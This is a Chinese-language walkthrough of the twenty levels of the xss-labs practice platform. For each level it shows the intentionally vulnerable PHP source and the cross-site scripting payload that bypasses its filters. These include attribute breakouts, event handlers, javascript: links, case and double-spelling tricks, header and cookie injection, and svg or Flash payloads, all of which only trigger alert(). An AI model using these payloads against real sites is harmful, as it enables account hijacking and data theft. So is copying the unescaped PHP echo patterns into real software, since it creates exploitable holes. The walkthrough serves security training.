xss-labs下载地址:GitHub - do0dl3/xss-labs: xss 跨站漏洞平台
xss常见触发标签:XSS跨站脚本攻击实例与防御策略-CSDN博客
level-1
首先查看网页的源代码发现get传参的name的值test插入了html里头,还回显了payload的长度。
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level2.php?keyword=test";
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<h2 align=center>欢迎用户test</h2><center><img src=level1.png></center>//test在这里回显
<h3 align=center>payload的长度:4</h3></body>
</html>
输入:?name=<script>alert()</script>即可。//alert:js弹窗函数。
查看一下源代码:
//没有过滤,直接传参触发xss即可
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level2.php?keyword=test";
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["name"];//产参输入
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
level-2
和第一关一样,先注入一下试试:<script>alert()</script>,没有成功,查看页面源代码。
可以看到,第一个的特殊符号尖括号被实体化了,但是第二个没有。不过第二个被双引号闭合起来了,语句没有被执行,那么闭合两侧的双引号和尖括号即可。
输入:"><script>alert()</script><"
查看一下源代码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level3.php?writing=wait";
}
</script>
<title>欢迎来到level2</title>
</head>
<body>
<h1 align=center>欢迎来到level2</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"]; //下面这个htmlspcialchars()函数将参数给实体化了
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
level-3
和之前一样输入:<script>alert()</script>,没有成功,查看页面源代码。
可以看到,两个地方都被实体化了。查看源代码,发现都是htmlspcialchars()函数进行的实体化,而此函数只是对尖括号进行实体化,所以我们可以使用onfocus事件绕过,代码中是用的单引号,所以需要单引号闭合。
onfocus事件:onfocus事件在元素获得焦点时触发,最常与 <input>、<select> 和 <a> 标签一起使用,简单来说,onfocus事件就是当输入框被点击的时候,就会触发myFunction()函数,然后我们再配合javascript伪协议来执行js代码。
输入:' onfocus=javascript:alert() '
输入完成后没有弹窗,再次点击一下输入框就可以触发。
level-4
查看页面源代码,发现这关用的是双引号。依然可以使用onfocus进行绕过。
输入:" onfocus=javascript:alert() "
查看一下源代码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level5.php?keyword=find a way out!";
}
</script>
<title>欢迎来到level4</title>
</head>
<body>
<h1 align=center>欢迎来到level4</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);//本行和下一行的代码将两个尖括号删除了。
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level4.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>
level-5
首先输入" onfocus=javascript:alert() ",查看页面源代码。
我们输入的on变成了o_n,这就过滤了onfocus方法。
查看一下源代码。
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level6.php?keyword=break it out!";
}
</script>
<title>欢迎来到level5</title>
</head>
<body>
<h1 align=center>欢迎来到level5</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);//将字母转化为小写。
$str2=str_replace("<script","<scr_ipt",$str);//过滤了script
$str3=str_replace("on","o_n",$str2);//过滤了onfocus
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level5.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>
有转化字母为小写的函数,所以,我们无法使用大小写绕过。这里我们使用a href方法。
a href方法:href的属性是 当<a>被点击时,会执行触发跳转。那么我们就可以触发执行一段js代码或者一段链接,这里插入一段js代码。
输入:"> <a href=javascript:alert()>xxx</a> <"
输入完成后点击xxx链接即可。
level-6
查看页面源代码,没有发现过滤了什么,输入关键词看看:onfocus <script> <a href=javascript:alert()>,再看源代码发现这几个都被过滤了。再加上大小写看看有没有被转化。输入:OnFocus <sCriPt> <a hReF=javascript:alert()>。
查看源代码:没有过滤大小写。
使用大小写绕过:
"> <sCript>alert()</sCript> <" " Onfocus=javascript:alert() " "> <a hRef=javascript:alert()>x</a> <" //三者选其一都可
查看源代码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level7.php?keyword=move up!";
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);//过滤script
$str3=str_replace("on","o_n",$str2);//过滤onfocus
$str4=str_replace("src","sr_c",$str3);//过滤src
$str5=str_replace("data","da_ta",$str4);//过滤data
$str6=str_replace("href","hr_ef",$str5);//过滤ghref
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level6.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>
level-7
和之前一样,输入关键词看看效果:" OnFocus <sCriPt> <a hReF=javascript:alert()>
查看源代码看看结果:如图:大写变成了小写,on,script,href,script这些关键词被删了。
被删除了,那么就用双拼写绕过即可,例如oonn,中间的on被删掉后依然是on。
输入:"> <a hrehreff=javasscriptcript:alert()>x</a> <"
level-8
本关看页面需要上传一个友情链接,先输入一个123看看,看到在input标签和href中有传到了输入的内容。
下来测试一下过滤情况,输入:" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>看一下结果。可以看到两个里面的尖括号和双引号都被实体化了。
这里需要使用到href的一个隐藏属性:href自动Unicode解码,我们可以插入一段js伪协议。
输入:javascript:alert()
使用在线工具进行Unicode编码,解码得:
javascript:alert()
输入后点击友情链接即可。
level-9
先输入关键词看看过滤情况:" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> j
没有插入成功,看下源代码。
当输入语句没有http://时,strpos函数会返回false和false相等,此时会执行if语句,因此我们需要输入中有http://但是要注释掉,以免影响执行其他语句。
输入:javascript:alert()/* http:// */
level-10
输入关键词看看过滤情况," sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> j
查看页面源代码发现全部被实体化了,查看源代码。
还有一个隐藏的传参t_sort,过滤掉了尖括号,使用onfocus事件,因为输入框被隐藏,所以添加type="text"。
输入:?t_sort=" onfocus=javascript:alert() type="text
输入完成点击输入框即可。
level-11
查看页面源代码
发现<input>标签里面四个值都做了隐藏,不过第四个名为t_ref的<input>标签是http头referer的参数(就是由啥地址转跳到这里的,http头的referer会记录有),使用get和post传参输入检查一下前三个,会发现都上传失败了,所以我们使用BP抓包添加http头。
输入:Referer: " onfocus=javascript:alert() type="text
输入后点击输入框即可。
level-12
查看源代码。
根据源代码,这是user-agent头,使用BP修改UA头即可。修改为:" onfocus=javascript:alert() type="text
level-13
查看页面源代码。
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level14.php";
}
</script>
<title>欢迎来到level13</title>
</head>
<body>
<h1 align=center>欢迎来到level13</h1>
<h2 align=center>没有找到和good job!相关的结果.</h2><center>
<form id=search>
<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="" type="hidden">
<input name="t_cook" value="" type="hidden">//t_cook考虑到cookie值。
</form>
</center><center><img src=level13.png></center>
<h3 align=center>payload的长度:9</h3></body>
</html>
打开F12找到cookie值修改,这次使用" onclick=alert() type="text ,当然onfocus也可以:" onfocus=javacript:alert() type="text
level-14
本关是要跳转到一个网站,在那个网站进行注入,但是现在网站崩了,就没法打了,直接到15关。
level-15
ng-include指令就是文件包涵的意思,用来包涵外部的html文件,如果包涵的内容是地址,需要加引号
这里我们可以包含第一关,然后进行绕过。
输入:?src='/level1.php?name=<img src=1 onmouseover=alert()>'
level-16
可以看到,test被插入进了center标签中,故而不需要闭合,测试一下关键字:
?keyword=" ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P <sCriPt> <a hReF=javascript:alert()> j
发现这里先是将字母小写化了,再把script替换成空格,最后将空格给实体化。/也被替换成了空格。使用<svg>标签。
输入:?keyword=<svg%0Aonload=alert(1)>
level-17
测试一下关键词发现使用了html转义,这里不需要闭合符号,传入的参数都出现在了embed标签上,打开后缀名为swf的文件(FLASH插件的文件,现在很多浏览器都不支持FLASH插件了)
embed标签:embed标签可以理解为定义了一个区域,可以放图片、视频、音频等内容,但是呢相对于他们,embed标签打开不了文件的时候就会没有显示的区域。
可以使用flash打开,如果不想下载,可以去源代码将xsfo01.swf改为index.png即可。
输入:?arg02= onclick=alert()
再点击一下图片即可。
level-18
和上一关一样,先改了一下后端的代码。只进行了实体化函数,和上一关基本一样。
输入:?arg02= onmousedown=alert()
level-19
最后几关都是flash xss。
输入:?arg01=version&arg02=<a href="javascript:alert()">here</a>
level-20
输入:?arg01=id&arg02=xss\"))}catch(e){alert(1)}//%26width=123%26height=123
